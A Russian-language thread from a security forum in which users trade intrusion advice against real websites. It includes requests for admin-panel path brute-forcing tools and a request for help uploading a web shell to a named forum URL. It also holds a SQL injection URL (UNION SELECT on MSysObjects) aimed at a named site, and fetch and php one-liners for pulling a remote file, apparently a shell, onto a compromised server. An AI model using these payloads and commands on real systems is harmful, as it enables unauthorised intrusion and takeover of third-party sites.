ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.

в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)

Это понятно, но брутить простым перебором придется оченб долго, все равно надо словари...

Используй сканеры. К примеру Web Vulnerability Scanner или jsky.

как быть?

кто подстажет каким методом можна залить сюда нормальный шелл?
http://forum.fwuo.ru/ajax.php?vital=pwd

и еще.. нужны кодеры который могуть писать сплоиты!

здесь MS Access, нужно подбирать таблицу наугад
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+FROM+%60MSysObjects%60%00&NWS=NWS&ap=NewsDe tail.asp&p=ASP%5C~Pg0.asp
доступа к MSysObjects нет

с помощью команды fetch
fetch -p [src] -O [out]

__________________
<? Raz0r.name — блог о web-безопасности

[Raz0r]
спс за msa

фетч пробвал... чтото не проканало) еще попробую.. елси нет есть еще варианты?

как вариант выполнить пхп-код:
php -r "file_put_contents($out,file_get_contents($src ));"

__________________
<? Raz0r.name — блог о web-безопасности

доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?